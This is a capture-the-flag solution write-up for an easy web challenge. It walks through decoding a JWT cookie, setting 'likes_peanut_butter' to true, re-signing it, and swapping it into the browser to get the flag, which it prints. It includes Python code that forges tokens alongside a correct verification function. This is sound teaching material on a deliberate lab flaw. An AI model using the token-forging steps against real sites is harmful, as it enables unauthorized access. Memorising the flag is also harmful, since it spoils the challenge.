write-ups-challenges-2024-2025/peanutbutter-challenges/peanutbutter-brand/SOLUTION.md
2024-11-25 22:31:56 +01:00


## Difficulty
Easy
## Category
Web
## How To Solve
This time, simply modifying the URL doesn't help.
When you push the 'retrieve' button on the /profile page, you get a message telling you that you can only get the best brand if you like peanut butter. A quick look at the Chrome DevTools Network tab shows that this message is the response to a GET request the page sends to the server after the button click. Under the request headers you can see that a cookie named `token` is sent along. This is interesting. ![](devtools_brand_request.png)
When visiting the /profile page, a GET request for profile information is made to the server. The server responds with the information but also instructs the browser (via a `Set-Cookie` response header) to store a cookie. That cookie is a JSON Web Token (JWT) named `token`. You can use the Chrome DevTools (Application tab, Cookies) to inspect it. ![](devtools_cookies.png) You can see that the cookie has the value `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlIjoiQ1RGIFBhcnRpY2lwYW50IiwibGlrZXNfcGVhbnV0X2J1dHRlciI6ZmFsc2V9._DG-nLXVTzNw_BoSQ240P6QNL9JbxRz6aWAgPFiXfVU`. A JWT is three base64url-encoded parts separated by dots (header, payload, signature); the first two are not encrypted, so anyone holding the token can read them. You can simply decode this JWT using an [online tool](https://jwt.io/#debugger-io?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlIjoiQ1RGIFBhcnRpY2lwYW50IiwibGlrZXNfcGVhbnV0X2J1dHRlciI6ZmFsc2V9._DG-nLXVTzNw_BoSQ240P6QNL9JbxRz6aWAgPFiXfVU).
The header decodes to `{"alg":"HS256","typ":"JWT"}`, i.e. the token is signed with HMAC-SHA256 using a secret only the server knows. The payload JSON is:
```json
{
  "role": "CTF Participant",
  "likes_peanut_butter": false
}
```
In this tool, modify the JSON by setting `likes_peanut_butter` to `true` (this was the requirement for obtaining the 'best brand'). You now get a new JWT: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlIjoiQ1RGIFBhcnRpY2lwYW50IiwibGlrZXNfcGVhbnV0X2J1dHRlciI6dHJ1ZX0.Ndo_jZn8fFltuKiZK9lyVoXyLuiueaPLUmuC7_0Y8j8`. Note that the tool re-signs the token with whatever secret you type into its signature box, and we never learn the server's secret, so the new signature cannot be valid for the server's key. The fact that the server accepts the token anyway means it decodes the payload without verifying the signature, which is the actual vulnerability here.
In your Chrome DevTools, change the value of the `token` cookie to the new JWT. Now simply push the 'retrieve' button again to obtain the flag. Do not refresh the page: that would trigger a new GET request for the profile information, and the server's `Set-Cookie` would overwrite your forged cookie with a freshly issued token (with `likes_peanut_butter` back to `false`).
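The decode, modify and re-sign steps above, as an added Python example that is not part of the original write-up: it parses the `token` cookie value quoted above using only the standard library, flips `likes_peanut_butter`, re-signs the token with an assumed secret (the server's real key is never learned in the challenge, so `b"secret"` is a placeholder), and shows the HS256 verification a server must perform to reject such a token.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional, Tuple

# Token copied from the write-up: the `token` cookie issued by the /profile request.
ORIGINAL_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJyb2xlIjoiQ1RGIFBhcnRpY2lwYW50IiwibGlrZXNfcGVhbnV0X2J1dHRlciI6ZmFsc2V9."
    "_DG-nLXVTzNw_BoSQ240P6QNL9JbxRz6aWAgPFiXfVU"
)

# Assumed signing key for the demonstration; the challenge server's key is unknown.
DEMO_SECRET = b"secret"


def b64url_decode(segment: str) -> bytes:
    """JWT segments omit base64 padding; restore it before decoding."""
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment)


def b64url_encode(data: bytes) -> str:
    """Base64url without padding, as used in compact JWS serialization."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def decode_jwt(token: str) -> Tuple[dict, dict, bytes]:
    """Split a compact JWT into (header, payload, signature) WITHOUT verifying it."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))
    return header, payload, b64url_decode(sig_b64)


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    """Build a compact HS256 JWT: b64url(header).b64url(payload).b64url(HMAC-SHA256)."""
    signing_input = ".".join(
        b64url_encode(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, payload)
    )
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def forge_token(token: str, changes: dict, secret: bytes) -> str:
    """Re-issue `token` with `changes` merged into its claims, signed with `secret`.

    Without the server's real key the signature will not validate; the attack
    only works because the challenge server never checks it.
    """
    header, payload, _ = decode_jwt(token)
    payload.update(changes)
    return sign_hs256(header, payload, secret)


def verify_hs256(token: str, secret: bytes) -> Optional[dict]:
    """What the server should do: pin the algorithm, recompute the MAC, reject mismatches."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
    except (ValueError, UnicodeDecodeError):
        return None
    if header.get("alg") != "HS256":  # never let the token choose the algorithm
        return None
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return None
    return json.loads(b64url_decode(payload_b64))


if __name__ == "__main__":
    print("original claims:", decode_jwt(ORIGINAL_TOKEN)[1])
    forged = forge_token(ORIGINAL_TOKEN, {"likes_peanut_butter": True}, DEMO_SECRET)
    print("forged token:   ", forged)
    print("verifies with our key:   ", verify_hs256(forged, DEMO_SECRET) is not None)
    print("verifies with other key: ", verify_hs256(forged, b"the-real-server-key") is not None)
```

The header and payload segments of the forged token are byte-for-byte the ones in the write-up's new JWT; only the signature segment differs, because it depends on the key. A server that ran `verify_hs256` with its own key would return `None` for the forged cookie and the trick would fail; the challenge is solvable precisely because the `likes_peanut_butter` claim is trusted straight out of the payload.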
## Flag
`IGCTF{H3L4ES_PIND4K44SSSSSS}`